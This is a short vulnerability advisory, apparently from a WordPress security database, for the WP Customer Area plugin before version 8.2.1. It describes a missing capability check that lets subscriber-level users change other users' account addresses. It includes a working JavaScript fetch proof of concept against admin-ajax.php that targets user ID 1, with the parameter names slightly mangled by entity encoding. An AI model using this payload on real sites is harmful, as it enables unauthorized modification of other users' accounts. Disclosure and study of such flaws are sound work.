WP Customer Area < 8.2.1 - Subscriber+ Account Address Update

Description The plugin does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users’ account address.

PoC

You may get the nonce from your save address form fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: ‘action=cuar_save_address_for_owner&cuar;_nonce=a73a7eab3b&owner;[type]=usr&owner;[ids][]=1&address;_id=home_address&address;[name]=hohohohoh’, “method”: “POST”, “mode”: “cors”, “credentials”: “include” }) .then((response) => { return response.text(); }) .then((data) => { console.log(data); });